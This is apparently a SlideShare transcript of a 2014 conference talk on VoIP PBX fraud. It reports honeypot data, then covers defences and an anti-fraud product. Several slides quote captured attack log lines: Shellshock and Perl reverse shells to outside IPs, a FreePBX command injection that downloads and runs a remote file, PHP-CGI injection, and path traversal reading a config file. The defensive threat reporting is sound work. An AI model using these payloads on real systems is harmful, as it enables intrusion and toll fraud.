SlideShare a Scribd company logo

No More Fraud, Astricon, Las Vegas 2014

Download as PPTX, PDF
Flavio Eduardo de Andrade Goncalves
Flavio Eduardo de Andrade Goncalves

Presentation regarding VoIP Fraud and PBX hacking at Astricon 2014 VoIP Security Training: Enroll here: http://bit.ly/2GL5MCT

Presentations & Public Speaking
1 of 42
No More Fraud! Let’s say “enough is enough”
About me Flavio E. Goncalves CTO of SipPulse (www.sippulse.com) Turnkey solutions for VoIP providers and Telcos. Anti-Fraud Solutions
Why you should care? Exposure for a single T1 line 43200 min/month, US$5/min, 23 lines US$ 4.968.000
Why they are doing? #1 Allocate a number and a recording in a PRN provider #2 Find a vulnerable device Using shodan #3 Make calls and cash your money
INTELLIGENCE GRABBED IN HONEYPOTS
Distribution by country 117636 105603 78656 32795 11910 11120 10702 3736 2836 1978 US FR DE PS RU TW SC SG GB CA
TOP Prefixes +972 Palestine +44 Great Britain +86 China +20 Egypt
TOP 5 PBX Exploits in September/October 1. Shellshock 2. PHP/LAMP Injection 3. SQL injection in Trixbox 4. Linksys remote code execution 5. FreePBX Remote Code Execution
#1 Shellshock • Exploit Date: 09/2014 Specimen: • [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'" • [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/ defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
#2 SQL injection in Trixbox • Exploit Date: 03/2014 - http://www.exploit-db. com/exploits/32239/ Specimen: • [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/ conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
#3 Linksys Remote Code Execution • Exploit Date: 02/2014 - http://www.exploit-db. com/exploits/31683/ Specimen: • [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
#4 LAMP Attacks • Apache/PHP Remote Exploit • Exploit date 10/2013 • Especimen: • POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n • [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/ php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61 %66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%6 9%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D %64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%7 0%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%7 2%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F% 73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“
#5 CallMeNum (Demo) • Exploit date: 03/2012 • Specimen: • GET /recordings/misc/callme_page.php?action=c&callmenum=888 @ext-featurecodes/n • Application: system • Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,“x.y.z.w:4446"); STDIN- >fdopen($c,r); $~->fdopen($c,w); $c- >write("]QAfH#.Eqncmpn"); system$_ while<>;'
Unknown Exploits • Jul/2014 • Specimen: [03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php [03/Jul/2014] "GET /fuxkkk.php [03/Jul/2014] "GET /recordings/theme/alexpass.php
Still uncommon • MANAGER PORT - 5038 • H323 - 1720 • MGCP – 5036 • TFTP – 69 • IAX2 - 4569
How hackers are getting into your PBX • #1 – Sip Brute Force (Fail2ban is effective) • #2 – Http Exploitation • #3 – Attacks to phones • #4 – Caller ID Spoofing • #5 – Billing/Credit card frauds
Part – III How to defend #1 Patching Everything and Upgrade frequently #2 Use a Firewall #3 Use a Session Border Controller #4 Use Encryption #5 Use an Anti-Fraud System
#1 Patch Everything, update frequently • Effectiveness: Low • Risk: High • Cost: High
#2 Use a Firewall or configure properly IP tables • Effectiveness: High • Risk: Medium • Cost: Low • Absolutely a must do. At least, no Internet access to SSH, no Internet access to HTTP/HTTPS. • No prevention for phones attacks
#3 Use a Session Border Controller • Effectiveness: Medium • Risk: Medium • Cost: Very High
#4 Use encryption • Effectiveness: Medium •Risk: Medium •Cost: High if you intend to do mutual authentication
#5 Use an AntiFraud System • Effectiveness: High • Risk: Very Low • Cost: Medium • Comments: Can detect 99.999% of the attacks, It prevents against caller ID spoofing, Social Engineering and Phone Attacks. • Limitations: Firewall restrictions are required to avoid tampering the anti-fraud rules.
Working Together in 2 steps 1. Make sure your customer’s firewall and fail2ban is configured right (You) 2. Partner with us to use TFPS on your customers (Us)
Fraud Prevention for All www.tfps.co
How effective it is an Anti-Fraud Solution •99.989% just by protocol signature. • Number obtained comparing the attacks registered on the honeypot against rules. Anti-Fraud Effectiveness Detected Undetected
www.tfps.co || tfps.sippulse.com 1. 99.89% of the attacks prevented by signature detection 2. Collaborative protection. One PBX hacked automatically blocks the IP for the others 3. Mechanism, SIP Redirect •No additional hardware required. •Available for OpenSIPS/Freeswitch/Asterisk
Asterisk Code [from-internal] ; Set there the context for your users ;FPS for International Calls exten=_011[1-9].,1,set(ip=${CHANNEL(recvip)}) same=>n,SIPAddHeader(P-Received: ${ip}) same=>n,set(ua=${CHANNEL(useragent)}) same=>n,SIPAddHeader(P-UA: ${ua}) same=>n,set(GROUP()=fps) same=>n,set(ncalls=${GROUP_COUNT(fps)}) same=>n,SIPAddHeader(P-Calls: ${ncalls}) same=>n,set(_original=${EXTEN}) same=>n,dial(SIP/fps/${EXTEN:2})
Asterisk Code [fps] ;For calls not approved exten=_R.,1,Answer() same=>n,playback(unauthorized); (Customize here to generate an error message) same=>n,hangup(21) ;For calls approved exten=_A.,1,Answer() same=>n,Dial(SIP/provider/${original});(Customize here to send the call ahead) same=>n,hangup(16)
Beyond blacklists,
Comparing to other anti-fraud solutions! • Pluggable • No Additional Hardware • Small traffic to be analyzed • Small risk, only a few calls can be affected. • Easy handling of outages
ANTI-FRAUD, HOW-TO (DEMO)
Thank You! • e-mail: flavio@sippulse.com • skype: flaviogoncalves1 • Twitter: @asteriskguide • blog.tfps.co
Backup Slides
#6 FreePBX 2.x Code Execution • Specimen: • [03/Jul/2014:17:28:41 +0000] "GET • /admin/config.php?display=auth&handler=api&func tion=system&args=cd%20/tmp;rm%20- f%20e;wget%20http://93.170.130.201:3003/e;perl% 20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
#4 VTIGER Exploit (Lots of variations) • 0001189: Vtiger CRM - php inject vulnerability • Specimen • 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?mo dule_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-“ • 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action= savewordtemplate HTTP/1.1" 404 537 "-" "-"
#4 PHP Code Injection Vulnerability • Specimen: • [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20- e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3 Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%22 93.170.130.201%3A3333%22)%3B%20STDIN- %3Efdopen(%24c%2Cr)%3B%20%24~- %3Efdopen(%24c%2Cw)%3B%20%24c- %3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20s ystem%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-“ • "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c- >write("]QAfH#.Eqnunkn"); system$_ while<>;'
#9 FreePBX Extension Dump Exploitation • Specimen: • 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log. php?handler=cdr&s=&t=&order=calldate &sens=DESC&current_page=0/admin/cdr/ca ll-comp.php HTTP/1.1" 404 484 "-" "-"
#6 Freeswitch Attacks GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df- df&template=linksys
#4 Caller ID Spoofing • 1 - Send 1 million calls and cancel • 2 - Fake the callerID to a PRN • 3 - Wait for the call back.
Open Source is a Target! •We are seeing scans for: • Vicidial • Astpp • phpMyAdmin (hot) • Tomcat • Jboss • FreeSwitch
First way to protect 1.Make sure your system is protected by a firewall 1. Vulnerability SCAN 2. Apply firewall rules to prevent unauthorized access to the server 3. Use .htaccess and implement dual authentication
# 5 SIP Phone Recent Vulnerabilities • Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10) • Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014- 3313/ (4.3) • Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014- 3312/ (6.9) • Yealink - http://www.cvedetails.com/cve/CVE-2014-3427 • Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/

Recommended

Number one-issue-voip-today-fraud
Number one-issue-voip-today-fraudNumber one-issue-voip-today-fraud
Number one-issue-voip-today-fraudFlavio Eduardo de Andrade Goncalves
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014Flavio Eduardo de Andrade Goncalves
 
Asterisk Voip
Asterisk VoipAsterisk Voip
Asterisk VoipVipin Sahu
 
Telephony Service Development on Asterisk Platform
Telephony Service Development on Asterisk PlatformTelephony Service Development on Asterisk Platform
Telephony Service Development on Asterisk PlatformHamid Fadishei
 
02 asterisk - the future of telecommunications
02 asterisk - the future of telecommunications02 asterisk - the future of telecommunications
02 asterisk - the future of telecommunicationsTran Thanh
 
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phonesDefcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phonesPriyanka Aash
 
Asterisk Phone Systems
Asterisk Phone SystemsAsterisk Phone Systems
Asterisk Phone SystemsTelephone Wreckers
 
Astricon 2010: Scaling Asterisk installations
Astricon 2010: Scaling Asterisk installationsAstricon 2010: Scaling Asterisk installations
Astricon 2010: Scaling Asterisk installationsOlle E Johansson
 

Recommended

Number one-issue-voip-today-fraud
Number one-issue-voip-today-fraudNumber one-issue-voip-today-fraud
Number one-issue-voip-today-fraudFlavio Eduardo de Andrade Goncalves
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014Flavio Eduardo de Andrade Goncalves
 
Asterisk Voip
Asterisk VoipAsterisk Voip
Asterisk VoipVipin Sahu
 
Telephony Service Development on Asterisk Platform
Telephony Service Development on Asterisk PlatformTelephony Service Development on Asterisk Platform
Telephony Service Development on Asterisk PlatformHamid Fadishei
 
02 asterisk - the future of telecommunications
02 asterisk - the future of telecommunications02 asterisk - the future of telecommunications
02 asterisk - the future of telecommunicationsTran Thanh
 
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phonesDefcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phones
Defcon 22-fatih-ozavci-vo ip-wars-attack-of-the-cisco-phonesPriyanka Aash
 
Asterisk Phone Systems
Asterisk Phone SystemsAsterisk Phone Systems
Asterisk Phone SystemsTelephone Wreckers
 
Astricon 2010: Scaling Asterisk installations
Astricon 2010: Scaling Asterisk installationsAstricon 2010: Scaling Asterisk installations
Astricon 2010: Scaling Asterisk installationsOlle E Johansson
 
Sangoma Vega Gateway Training Presentation
Sangoma Vega Gateway Training PresentationSangoma Vega Gateway Training Presentation
Sangoma Vega Gateway Training PresentationEmpatiq İletişim Teknolojileri AŞ.
 
Asterisk: dongled !
Asterisk: dongled !Asterisk: dongled !
Asterisk: dongled !Francesco Prior
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...PROIDEA
 
How to hack a telecom and stay alive
How to hack a telecom and stay aliveHow to hack a telecom and stay alive
How to hack a telecom and stay aliveqqlan
 
Scanning The Intertubes For Voip
Scanning The Intertubes For VoipScanning The Intertubes For Voip
Scanning The Intertubes For VoipSandro Gauci
 
Asterisk: dongled !
Asterisk: dongled !Asterisk: dongled !
Asterisk: dongled !Francesco Prior
 
*astTECS - IP PBX_2018
*astTECS - IP PBX_2018*astTECS - IP PBX_2018
*astTECS - IP PBX_2018Salman Muhammed Ashraf
 
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...Codemotion
 
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...Positive Hack Days
 
CCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeCCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeAhmed Habib
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Unv banking &amp; finance video surveillance solution v1.00
Unv banking &amp; finance video surveillance solution v1.00Unv banking &amp; finance video surveillance solution v1.00
Unv banking &amp; finance video surveillance solution v1.00Abul Hasnat Sohel
 
Authentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsAuthentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsVideoguy
 
Grandstream Network Video Recorder GVR3550 presentation
Grandstream Network Video Recorder GVR3550 presentationGrandstream Network Video Recorder GVR3550 presentation
Grandstream Network Video Recorder GVR3550 presentationEmpatiq İletişim Teknolojileri AŞ.
 
CCNA Security 06- AAA
CCNA Security 06- AAACCNA Security 06- AAA
CCNA Security 06- AAAAhmed Habib
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSSqqlan
 
LinuxCon North America: SIPPing from the Open Source Well
LinuxCon North America: SIPPing from the Open Source WellLinuxCon North America: SIPPing from the Open Source Well
LinuxCon North America: SIPPing from the Open Source WellMatt Bynum
 
Yealink CP960 HD IP Conference Phone Data Sheet
Yealink CP960 HD IP Conference Phone Data SheetYealink CP960 HD IP Conference Phone Data Sheet
Yealink CP960 HD IP Conference Phone Data Sheetbest4systems
 
Building a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsBuilding a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsPaloSanto Solutions
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...APNIC
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxC4Media
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones HijackingPriyanka Aash
 

More Related Content

What's hot

"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...PROIDEA
 
How to hack a telecom and stay alive
How to hack a telecom and stay aliveHow to hack a telecom and stay alive
How to hack a telecom and stay aliveqqlan
 
Scanning The Intertubes For Voip
Scanning The Intertubes For VoipScanning The Intertubes For Voip
Scanning The Intertubes For VoipSandro Gauci
 
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...Codemotion
 
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...Positive Hack Days
 
CCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeCCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeAhmed Habib
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Unv banking &amp; finance video surveillance solution v1.00
Unv banking &amp; finance video surveillance solution v1.00Unv banking &amp; finance video surveillance solution v1.00
Unv banking &amp; finance video surveillance solution v1.00Abul Hasnat Sohel
 
Authentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsAuthentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsVideoguy
 
CCNA Security 06- AAA
CCNA Security 06- AAACCNA Security 06- AAA
CCNA Security 06- AAAAhmed Habib
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSSqqlan
 
LinuxCon North America: SIPPing from the Open Source Well
LinuxCon North America: SIPPing from the Open Source WellLinuxCon North America: SIPPing from the Open Source Well
LinuxCon North America: SIPPing from the Open Source WellMatt Bynum
 
Yealink CP960 HD IP Conference Phone Data Sheet
Yealink CP960 HD IP Conference Phone Data SheetYealink CP960 HD IP Conference Phone Data Sheet
Yealink CP960 HD IP Conference Phone Data Sheetbest4systems
 
Building a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsBuilding a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsPaloSanto Solutions
 

What's hot (19)

Sangoma Vega Gateway Training Presentation
Sangoma Vega Gateway Training PresentationSangoma Vega Gateway Training Presentation
Sangoma Vega Gateway Training Presentation
 
Asterisk: dongled !
Asterisk: dongled !Asterisk: dongled !
Asterisk: dongled !
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
 
How to hack a telecom and stay alive
How to hack a telecom and stay aliveHow to hack a telecom and stay alive
How to hack a telecom and stay alive
 
Scanning The Intertubes For Voip
Scanning The Intertubes For VoipScanning The Intertubes For Voip
Scanning The Intertubes For Voip
 
Asterisk: dongled !
Asterisk: dongled !Asterisk: dongled !
Asterisk: dongled !
 
*astTECS - IP PBX_2018
*astTECS - IP PBX_2018*astTECS - IP PBX_2018
*astTECS - IP PBX_2018
 
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...
From IoT to Human Interactions: Voice and Messages to the rescue - Stève Sfar...
 
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...
Критически опасные уязвимости в популярных 3G- и 4G-модемах или как построить...
 
CCNA Security 05- securing the management plane
CCNA Security 05- securing the management planeCCNA Security 05- securing the management plane
CCNA Security 05- securing the management plane
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Unv banking &amp; finance video surveillance solution v1.00
Unv banking &amp; finance video surveillance solution v1.00Unv banking &amp; finance video surveillance solution v1.00
Unv banking &amp; finance video surveillance solution v1.00
 
Authentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing SystemsAuthentication Methods in Videoconferencing Systems
Authentication Methods in Videoconferencing Systems
 
Grandstream Network Video Recorder GVR3550 presentation
Grandstream Network Video Recorder GVR3550 presentationGrandstream Network Video Recorder GVR3550 presentation
Grandstream Network Video Recorder GVR3550 presentation
 
CCNA Security 06- AAA
CCNA Security 06- AAACCNA Security 06- AAA
CCNA Security 06- AAA
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSS
 
LinuxCon North America: SIPPing from the Open Source Well
LinuxCon North America: SIPPing from the Open Source WellLinuxCon North America: SIPPing from the Open Source Well
LinuxCon North America: SIPPing from the Open Source Well
 
Yealink CP960 HD IP Conference Phone Data Sheet
Yealink CP960 HD IP Conference Phone Data SheetYealink CP960 HD IP Conference Phone Data Sheet
Yealink CP960 HD IP Conference Phone Data Sheet
 
Building a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communicationsBuilding a new ecosystem for interoperable communications
Building a new ecosystem for interoperable communications
 

Similar to No More Fraud, Astricon, Las Vegas 2014

IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...APNIC
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxC4Media
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones HijackingPriyanka Aash
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdwebuploader
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloudrandomuserid
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hosterCombell NV
 
04-post-connection-attacks.pdf
04-post-connection-attacks.pdf04-post-connection-attacks.pdf
04-post-connection-attacks.pdfxasako1838
 
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...YuChianWu
 
VoIP Security 101 what you need to know
VoIP Security 101 what you need to knowVoIP Security 101 what you need to know
VoIP Security 101 what you need to knowEric Klein
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsERPScan
 
IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013Zivaro Inc
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleGuardicore
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
Firewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaFirewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaHanaysha
 
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with BitsquattingBishop Fox
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 

Similar to No More Fraud, Astricon, Las Vegas 2014 (20)

IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloud
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hoster
 
04-post-connection-attacks.pdf
04-post-connection-attacks.pdf04-post-connection-attacks.pdf
04-post-connection-attacks.pdf
 
Securing Asterisk: A practical approach
Securing Asterisk: A practical approachSecuring Asterisk: A practical approach
Securing Asterisk: A practical approach
 
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
Im-A-Hacker-Get-Me-Out-Of-Here-Breaking-Network-Segregation-Using-Esoteric-Co...
 
VoIP Security 101 what you need to know
VoIP Security 101 what you need to knowVoIP Security 101 what you need to know
VoIP Security 101 what you need to know
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at Scale
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Firewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaFirewall arch by Tareq Hanaysha
Firewall arch by Tareq Hanaysha
 
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
